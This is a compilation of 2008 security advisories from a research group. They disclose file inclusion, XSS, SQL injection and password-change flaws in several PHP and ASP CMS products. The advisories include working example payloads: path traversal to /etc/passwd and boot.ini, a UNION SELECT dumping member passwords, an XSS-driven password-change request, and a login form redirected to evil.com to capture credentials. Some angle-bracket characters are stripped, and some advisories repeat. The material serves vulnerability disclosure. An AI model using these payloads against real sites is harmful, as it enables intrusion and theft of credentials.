PowerNews (Newsscript) has Multiple Local File Include vulnerabilities.
1. Local File Include vulnerabilities found in scripts:
pnadmin/categories.inc.php
pnadmin/news.inc.php
pnadmin/other.inc.php
pnadmin/permissions.inc.php
pnadmin/templates.inc.php
pnadmin/users.inc.php
Non-authentication user can directly access to this scripts.
Code
#
if ($_GET[subpage]) {
if (file_exists($_GET[page]._.$_GET[subpage]..inc.php)) {
include($_GET[page]._.$_GET[subpage]..inc.php);
} else {
?center?PHP echo L_ALL_SUBPAGENOTFOUND; ?/center?PHP
}
} else {
#
Example:
http://[server]/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00
2. Local File Include vulnerability found in script pnadmin/index.php in admin
area.
Administrator can include local files.
Code
#
if ($pnloggedin != YES) {
include(login.inc.php);
} else {
if (!$_GET[page]) { $_GET[page] = main; }
if (file_exists($_GET[page]..inc.php)) {
include($_GET[page]..inc.php); } else {
#
Example:
http://[server]/[installdir]/pnadmin/index.php?page=../../../../../../../../../../../../../etc/passwd%00
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-013
Application:MODx CMS
Versions Affected: 0.9.6.1, 0.9.6.1p1
Vendor URL: http://modxcms.com/
Bugs: XSS, SiXSS, stored XSS, Change User Password
XSRF Vulnerability.
Exploits: YES
Reported: 11.01.2008
Vendor response:11.01.2008
Updated Report: 29.01.2008
Vendor response:none
Solution: none
Date of Public Advisory:07.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
MODx system has multiple security vulnerabilities:
1. Linked XSS
2. Linked SiXSS
3. XSS in POST
4. Stored XSS in POST
5. Change User Password XSRF Vulnerability
Details
***
1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL
string.
1.1 Linked XSS vulnerability found in manager/index.php. GET parameter search
Search string is available in pages:
http://[server]/[installdir]/manager/index.php?a=75
http://[server]/[installdir]/manager/index.php?a=84
http://[server]/[installdir]/manager/index.php?a=99
http://[server]/[installdir]/manager/index.php?a=106
http://[server]/[installdir]/manager/index.php?a=114
Example:
http://[server]/[installdir]/manager/index.php?a=75search=;IMG
SRC=javascript:alert('DSecRG XSS')
http://[server]/[installdir]/manager/index.php?a=84search=;IMG
SRC=javascript:alert('DSecRG XSS')
1.2 Linked XSS vulnerability found in index.php. GET parameter highlight
Example:
http://[server]/[installdir]/index.php?searched=modxhighlight=;IMG
SRC=javascript:alert('DSecRG XSS')
--
2. Multiple linked SiXSS vulnerabilities found. Attacker can inject XSS code in
SQL Error.
2.1 Vulnerability found in script manager/index.php. GET parameter a
Example:
http://[server]/[installdir]/manager/index.php?a='img
src=javascript:alert('DSecRG XSS')
2.2 Vulnerability found in script index.php. GET parameter id
Example:
http://[server]/[installdir]/index.php?id='img src=javascript:alert('DSecRG
XSS')
---
3. XSS in POST, attacker can inject XSS in POST parameter
3.1 Vulnerability found in script index-ajax.php.
POST parameters docgrp and moreResultsPage.
Example:
moreResultsPage = IMG SRC=javascript:alert('DSecRG XSS')
3.2 Vulnerability found in script index.php.
POST parameters email, name and parent.
Example:
name = style=background:url(javascript:alert('DSecRG XSS'))
---
4. Vulnerability found in script manager/index.php?a=10
POST parameters messagesubject and messagebody.
Attacker can comprose message with script code in subject and message body.
---
5. Change User Password XSRF Vulnerability
Previous password not required to set a new password.
Using XSS vulnerabilities, attacker can include following code to change user
password:
___
IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',http://[server]/[installdir]/manager/index.php?a=34,false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send(pass1=123456%26pass2=123456);`
___
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-012] Multiple LFI in Azucar CMS 1.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-012
Application:Azucar CMS
Versions Affected: 1.3
Vendor URL: http://azucarcms.sourceforge.net/en_home.htm
Bug:Multiple Local File Include
Exploits: YES
Reported: 30.01.2008
Vendor Response:NONE
Date of Public Advisory:05.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Azucar CMS has Multiple Local File Include vulnerabilities.
1. Local File Include vulnerabilities found in scripts index.php and
index_sitios.php
Code
#
if (isset($_GET[_VIEW]) ereg(^src|^vistas, $_GET[_VIEW]))
include($_GET[_VIEW]);
else
header(Location: html/sitio/);
#
Example:
http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd
2. Local File Include vulnerability found in script
src/sistema/vistas/template/tpl_inicio.php
Code
#
$vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO .
'vistas/index.php';
include($vista);
#
Example:
http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd
3. Local File Include vulnerability found in script html/sitio/index.php
Code
#
if (isset($_GET[_VIEW])) {
if (!file_exists($_GET[_VIEW])) {
$vista_array = explode('/', $_GET[_VIEW]);
$vista = $vista_array[0] . '/es_ES/' . $vista_array[2];
} else
$vista = $_GET[_VIEW];
}
$vista = (isset($_GET[_VIEW]) ereg(^src|^vistas, $_GET[_VIEW])) ? $vista :
PATH_PROYECTO . 'vistas/es_ES/index.php';
include($vista);
#
Example:
http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-010] VHD Web Pack 2.0 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-010 Application:VHD Web Pack 2.0 Versions Affected: VHD Web Pack 2.0 Vendor URL: http://www.divideconcept.net/index.php?page=vhdwebpack/index.php Bugs: Local File Include Exploits: YES Reported: 28.01.2008 Vendor response:NONE Date of Public Advisory:04.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** VHD Web Pack 2.0 system has Local file Include security vulnerability Details *** Local File Include Attacker can inject PHP code and execute OS commands with webserver user privileges vulnerable script /vhdwebpack/index.php vulnerable parameter page Example: http://[server]/vhdwebpack/index.php?page=/../../../../../../../../boot.ini About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-009] xoops 2.0.18 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-009
Application:XOOPS
Versions Affected: XOOPS 2.0.18
Vendor URL: http://www.xoops.org/
Bugs: Local File Include,URL Redirecting phishing
Exploits: YES
Reported: 28.01.2008
Vendor response:28.01.2008
Date of Public Advisory:04.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
XOOPS system has multiple security vulnerabilities:
1. Local File Include
2. Url redirection Phishing
Details
***
1. Local File Include
Attacker can inject PHP code and execute OS commands with webserver user
privileges
vulnerable script htdocs/install/index.php vulnerable POST parameter lang
vulnerable code:
$language = 'english';
if ( !empty($_POST['lang']) ) {
$language = $_POST['lang'];
.
.
.
.
if ( file_exists(./language/.$language./install.php) ) {
include_once ./language/.$language./install.php;
Example:
POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian;
PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php
lang=/../../../../../../../../boot.ini%00.htmlop=startsubmit=Next
-
2. URL Redirection phishing
Vulnerability found in script htdocs/user.php?xoops_redirect in post parameter
name xoops_redirect
Example:
http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com
Fix Information
***
Vendor fix this flaw in svn on 28.10.2007.
http://xoops.svn.sourceforge.net/viewvc/xoops?view=revrevision=1282
Tracker:
http://sourceforge.net/tracker/index.php?func=detailatid=430840aid=1881236group_id=41586
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011
Application:Astrosoft HelpDesk
Versions Affected:
Vendor URL: http://astrosoft.ru/
Bugs: Multiple XSS Injections
Exploits: YES
Reported: 29.01.2008
Vendor response:NONE
Date of Public Advisory:04.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Astrosoft HelpDesk system has multiple security vulnerabilities:
1. Linked XSS
2. Linked SiXSS
Details
***
1. Linked XSS vulnerability found in
operator/article/article_search_results.asp, attacker can inject XSS in GET
parameter txtSearch
Example:
http://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch=;/formIMG
SRC=javascript:alert('DSecRG XSS')
2. SiXSS in URL
Vulnerability found in script operator/article/article_attachment.asp, attacker
can inject XSS code in SQL Error.
GET parameter Attach_Id
Example:
http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id=;scriptalert('DSecRG
XSS')/script
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-008
Application:Txp CMS
Versions Affected: 4.0.5
Vendor URL: http://www.textpattern.com
Bugs: DOS, multiple XSS, etc.
Exploits: YES
Reported: 11.01.2008
Vendor response:14.01.2008
Patch Released: 03.02.2008
Date of Public Advisory:04.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Textpattern system has multiple security vulnerabilities:
1. Parameter Value Overflow
2. Linked XSS
3. XSS in POST
4. Stored XSS
5. Insecure password changing algorithm
Details
***
1. Parameter Value Overflow
Vulnerability found in script index.php in comments section. Post parameter
message.
The application does not ensure that the parameter value length. It can be used
for performing a DOS attack.
Example:
message = [A]x1
2. Linked XSS vulnerability found in /textpattern/setup/index.php, attacker can
inject XSS in URL string.
Example:
http://[server]/[installdir]/textpattern/setup/index.php/;scriptalert('DSecRG
XSS')/script
3. XSS in POST
Vulnerability found in script index.php in comments section. Post parameter
name.
Example:
name = img src=javascript:alert('DSecRG XSS')
name = scriptalert('DSecRG XSS')/script
4. Stored XSS
Vulnerability found in script textpattern/index.php?event=article in post
parameter Body.
Example:
Body = IMG SRC=javascript:alert(quot;DSecRG_XSSquot;)
5. Insecure password changing algorithm
Previous password not required to set a new password.
If attacker gain access to admin session by using XSS vulnerability, he can
change admin password without knowing old password.
It will be more secure to ask old password when changing password or primary
email.
Fix Information
***
Textpattern was altered to fix this flaw on 03.02.2008. Updated version (4.0.6)
can be downloaded here:
http://textpattern.com/download
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory
Application:OpenBSD BGPD daemon
Versions Affected: OpenBSD 4.1
Vendor URL: http://openbsd.org
Bugs: XSS
Exploits: YES
Reported: 10.10.2007
Vendor response:10.10.2007
Date of Public Advisory:31.01.2008
Authors:Alexandr Polyakov, Anton Karpov
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
OpenBSD BGPD daemon Web Interface has XSS vulnerability
History
http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html
Details
***
Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS
in parameter cmd
Example:
http://[server]/cgi-bin/bgplg?cmd=shov+versionscriptalert('DSecRG
XSS')/script
Fix Information
***
Vendor was altered to fix this flaw in svn on 10.10.2007. Updated version
OpenBSD 4.2 which was released Nov 1, 2007. can be downloaded here:
http://openbsd.org
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL
PROTECTED]
Re: [DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
version 4.2 is NOT affected, please alter it in advisory
http://secunia.com/advisories/28726/ and others.
Vendor fix this flaw in cvs on 10.10.2007.
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/bgplg/bgplg.c
Updated version OpenBSD 4.2 which was released Nov 1, 2007 is NOT
vulnerable.
[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory
Application:OpenBSD BGPD daemon
Versions Affected: OpenBSD 4.1
Vendor URL: http://openbsd.org
Bugs: XSS
Exploits: YES
Reported: 10.10.2007
Vendor response:10.10.2007
Date of Public Advisory:31.01.2008
Authors:Alexandr Polyakov, Anton Karpov
Digital Security Research Group
[DSecRG] (research [at] dsec [dot] ru)
Description
***
OpenBSD BGPD daemon Web Interface has XSS vulnerability
History
http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html
Details
***
Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject
XSS in parameter cmd
Example:
http://[server]/cgi-bin/bgplg?cmd=shov+versionscriptalert('DSecRG
XSS')/script
Fix Information
***
Vendor fix this flaw in cvs on 10.10.2007. Updated
version OpenBSD 4.2 which was released Nov 1, 2007. can be downloaded here:
http://openbsd.org
About
*
Digital Security is leading IT security company in Russia,
providing information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital
Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
С уважением,
Digital Security Research Group mailto:[EMAIL
PROTECTED]
Remote File Disclosure in phpCMS 1.2.2
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-005
Application:phpCMS
Versions Affected: 1.2.2
Vendor URL: http://www.phpcms.de
Bug:Remote File Disclosure, Get admin password
Exploits: YES
Reported: 10.01.2008
Vendor response:12.01.2008
Date of Public Advisory:29.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
phpCMS system has remote File Disclosure vulnerability in page
/parser/include/class.cache_phpcms.php
Details
***
Attacer can read any files in web directory.
In file parser/parser.php include class.cache_phpcms.php
---
// Load the i18n Handler
if (isset ($_GET ['file']) isset($DEFAULTS-I18N) 'on' ==
$DEFAULTS-I18N) {
include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');
$I18N = new i18n;
}
$PHPCMS-check_secure_stealth();
include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');
exit;
---
In file class.cache_phpcms.php function GetFile() parse URL and return full
file name or default value.
Function checks file extension but does't check for null byte injection.
To read file attacker must append a valid extension with null byte to file
like a %00.gif or smth.
---
// filequery exists, but filename is empty? - set the defaultvalue for filename
if(!stristr($temp, $DEFAULTS-PAGE_EXTENSION) AND
!stristr($temp, '.gif') AND
!stristr($temp, '.png') AND
!stristr($temp, '.jpg') AND
!stristr($temp, '.js') AND
!stristr($temp, '.css') AND
!stristr($temp, '.htm') AND
!stristr($temp, '.html'))
{ if(substr($temp, -1) != '/') {
$temp = trim($temp).'/'.$DEFAULTS-PAGE_DEFAULTNAME;
$temp.= $DEFAULTS-PAGE_EXTENSION;
} else {
$temp = trim($temp).$DEFAULTS-PAGE_DEFAULTNAME;
$temp.= $DEFAULTS-PAGE_EXTENSION;
}
}
---
In file class.cache_phpcms.php function CheckFile() take file name and if file
exist read it and print file contents.
---
$PfadUndDatei = $this-GetFile();
$this-name = basename($PfadUndDatei);
$this-path = dirname($PfadUndDatei);
...
// there's no contentfile with this name - errorpage or errormessage
if(!file_exists($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name)) {
$errorname = basename($DEFAULTS-ERROR_PAGE_404);
$errorpath = dirname($DEFAULTS-ERROR_PAGE_404);
...
...
$fsize = filesize($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name);
$fd = fopen($DEFAULTS-DOCUMENT_ROOT.$this-path.'/'.$this-name, rb);
$contents = fread($fd, $fsize);
$contents = trim($contents);
$fsize = strlen($contents);
fclose($fd);
...
echo $contents;
---
Example:
http://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif
default.php includes admin password and other defaults:
---
class defaults {
function defaults() {
global $PHP, $PHPCMS;
if(!defined(_DEFAULTS_)) {
define(_DEFAULTS_, TRUE);
}
$this-PASS = 'YourPasswordHere';
...
---
In windows we can read any local file:
http://[server]/[installdir]/parser/parser.php?file=\..\..\..\..\..\..\..\..\..\..\boot.ini%00.gif
http://www.phpcms.de/download/index.en.html
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
Nucleus 3.31 XSS in path
Hello.
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006
Application:Nucleus CMS
Versions Affected: 3.31
Vendor URL: http://nucleuscms.org
Bugs: XSS Injestion in URL
Exploits: YES
Reported: 16.01.2008
Vendor response:18.01.2008
Date of Public Advisory:29.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Linked XSS vulnerability found in action.php, attacker can inject XSS in URL
string:
Example:
http://[server]/[installdir]/action.php/;scriptalert('DSecRG
XSS')/script
Fix Information
***
TikiWiki was altered to fix this flaw on 29 january 2008. Updated version
(3.32) can be downloaded here:
http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
mailto:[EMAIL PROTECTED]
[!!FIX Information ] Nucleus 3.31 XSS in path
It is updated version of advisory. updated info in Fix
Information part, mistake in vendor name.
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006
Application:Nucleus CMS
Versions Affected: 3.31
Vendor URL: http://nucleuscms.org
Bugs: XSS Injection in URL
Exploits: YES
Reported: 16.01.2008
Vendor response:18.01.2008
Date of Public Advisory:29.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Linked XSS vulnerability found in action.php, attacker can inject XSS in URL
string:
Example:
http://[server]/[installdir]/action.php/;scriptalert('DSecRG
XSS')/script
Fix Information
***
Nucleus was altered to fix this flaw on 29 January 2008. Updated version (3.32)
can be downloaded here:
http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
mailto:[EMAIL PROTECTED]
[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-003
Application:Blogcms
Versions Affected: Blogcms 4.2.1b
Vendor URL: http://blogcms.com/
Bugs: SQL Injestions, SiXSS, XSS
Exploits: YES
Reported: 15.01.2008
Vendor response:16.01.2008
Date of Public Advisory:16.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Blogcms system has multiple security vulnerabilities:
1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS
Details
***
1. Multiple SQL Injection vulnerabilities
1.1 Attacker can inject SQL code in index.php. Parameter name blogid
Example:
http://[server]/[installdir]/index.php?query=asdblogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
1.2 Attacker can inject SQL code in module /blogcms/action.php. POST parameter
name user
Example:
POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET
CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive
action=addcommenturl=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1itemid=1body=asduserid=asdx=42y=13user=asd'+[DSecRG_INJECTION]
---
2. Multiple Linked XSS vulnerabilities
Linked XSS vulnerability found in /photo/admin.php and /photo/index.php
attacker can inject XSS script in URL
Example:
http://[server]/[installdir]/photo/admin.php/;scriptalert('DSECRG_XSS')/script
http://[server]/[installdir]/photo/index.php/;scriptalert('DSECRG_XSS')/script
---
3. Multiple SiXSS (XSS throught SQl Injection Error) vulnerabilities
3.1 Linked SiXSS vulnerability found in index.php, attacker can inject XSS code
in SQL Error
Example:
http://[server]/[installdir]/index.php?query=asdamount=0blogid=1'scriptalert('DSecRG_XSS')/script;x=34y=6
3.1 Linked SiXSS vulnerability found in /admin/plugins/table/index.php,
attacker can inject XSS code in SQL Error
It is also a SQL injection but because it is in admin panel it is not critical.
Example:
http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplatefield=title'scripta=/DSecRG
XSS/%0d%0aalert(a.source)/scriptid=2text=0
---
Fix Information
***
Blogcms was altered to fix this flaw on 16.01.2008. Updated version (4.2.1.c)
can be downloaded here:
http://blogcms.com/?item=download
Changelog: http://blogcms.com/wiki/changelog
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-002] Local File Include in arias 0.99-6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-002
Application:aria-0.99-6 (Web based ERP)
Versions Affected: aria-0.99-6
Vendor URL: http://www.tucows.net/
Bug:Local File Include
Exploits: YES
Reported: 09.01.2008
Vendor Response:None
Date of Public Advisory:15.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Aria has Local File Include vulnerability in page arias/help/effect.php
Code
if (empty($_GET['page'])) {
$page = 'help.php';
} else {
$page = $_GET['page'];
}
if (false == is_file($page)) {
$page = 'file_not_found.php';
}
include($page);
}
Example:
http://[server]/[installdir]/arias/help/effect.php?page=[file]
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
LFI in Tuned Studios Templates
Digital Security Research Group [DSecRG] Advisory #DSECRG08-001
Application:Tuned Studios Templates
Versions Affected: All
Vendor URL: http:/www.tunedstudios.com
Bug:Local File Include
Exploit:YES
Reported: 09.01.2008
Date of Public Advisory:09.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Tuned Studios Templates has Local File Include vulnerability in page
phpversion/index.php
Details
***
Tuned Studios has many templates based on same vulnerable php code
Code
//First check if $page exists
//With the introduction of PHP 5 we have to capture the $page from the url.
$page = $_GET['page'];
if(isset($page) $page != '')
{
//Check if the page $page exists
if(file_exists($page.'.php'))
{
//Now we can include the page.
include($page.'.php');
}
else
{
//Page can't be found, include the error file
include('data/error404.data.php');
}
}
Example:
http://[server]/[installdir]/index.php?page=../../../../../../../[file]%00
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
2z-project 0.9.6.1 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory
Name:2z project
Systems Affected:2z project 0.9.6.1
Vendor URL: http://2z-project.ru
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG] (research
[at] dsec [dot] ru)
Reported:27.12.2007
Vendor response: 27.12.2007
Date of Public Advisory: 28.12.2007
Description
***
2z system has multiple security vulnerabilities:
1. Stored XSS
2. Linked XSS
3. Image XSS
4. Path disclosure
5. Vulnerable Password changing algorithm
Details
***
1. Multiple Stored XSS
1.1 Vulnerability in script http://[server]/[installdir]/?action=addnews in
post parameters:
parameter name = contentshort
parameter name = contentfull
Example:
contentshort=scriptalert('DSecRG XSS')/script
contentfull=scriptalert('DSecRG XSS')/script
1.2 Vulnerability in script
http://[server]/[installdir]/2z/admin.php?mod=pmaction=write
parameter name = content
Example:
content=scriptalert('DSecRG XSS')/script
---
2. Linked XSS Vulnerability in page index.php.
Working only if user not logged in. So it can be used for Phishing (see
Example).
Template /templates/default/usermenu.tpl have vulnetability parameter
referer.
This template included to index.php, so it can be used for Phishing.
Source code of usermenu.tpl:
---
form name=login method=post action= id=login
input type=hidden name=referer value={request_uri} / -- html code
injected into {request_uri}
input type=hidden name=action value=dologin /
..
input onfocus=if (!set_login){set_login=1;this.value='';} value={l_name}
class=mw_login_form type=text name=username maxlength=60 size=25 /
..
input onfocus=if(!set_pass){set_pass=1;this.value='';} value={l_password}
class=mw_login_form type=password name=password maxlength=20 size=25
/
..
/from
---
Example:
http://[server]/[installdir]/?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value=
http://[server]/[installdir]/index.php?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value=
-
3. Image XSS Vulnetability in page /2z/?action=profile
Attacker can upload avatar and photo contained a XSS code.
Vulnerable parameters: newavatar, newphoto
For more information see http://www.dsec.ru/about/articles/web_xss/ (in russian)
-
4. Path disclosure
By exploiting this issue, an attacker may gain sensitive information on the
directory
structure of the server machine, which allows for further attacks against the
site.
Example:
http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234month=06
-
5. Password changing vulnerabiluity
Old password not needed to change password.
-
About
*
Digital Security is leading IT security company in Russia, providing
information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards.
